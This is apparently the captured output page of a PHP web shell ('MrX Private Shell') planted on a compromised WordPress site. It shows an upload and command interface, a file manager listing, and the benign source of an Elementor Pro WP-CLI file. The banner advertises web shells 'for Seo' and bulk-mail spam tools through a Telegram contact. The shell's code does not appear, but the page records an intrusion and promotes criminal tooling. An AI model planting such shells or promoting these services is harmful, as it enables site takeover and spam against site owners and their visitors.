__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
namespace ElementorPro\Modules\WpCli;

use ElementorPro\Modules\ThemeBuilder\Classes\Conditions_Cache;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

/**
* Elementor Pro Page Builder cli tools.
 */
class ThemeBuilder extends \WP_CLI_Command {

	/**
	 * Clear template conditions cache.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor-pro theme-builder clear-conditions
	 *
	 * @since  3.13.0
	 * @access public
	 * @alias clear-conditions
	 */
	public function clear_conditions() {
		$cache = new Conditions_Cache();
		$cache_cleared = $cache->regenerate();

		if ( is_wp_error( $cache_cleared ) ) {
			\WP_CLI::error( $cache_cleared->get_error_message() );
		}

		\WP_CLI::success( 'Template conditions cache is cleared.' );
	}
}

Filemanager

Name Type Size Permission Actions
license-command.php File 1.73 KB 0664
module.php File 817 B 0664
theme-builder.php File 759 B 0664
update.php File 355 B 0664
Filemanager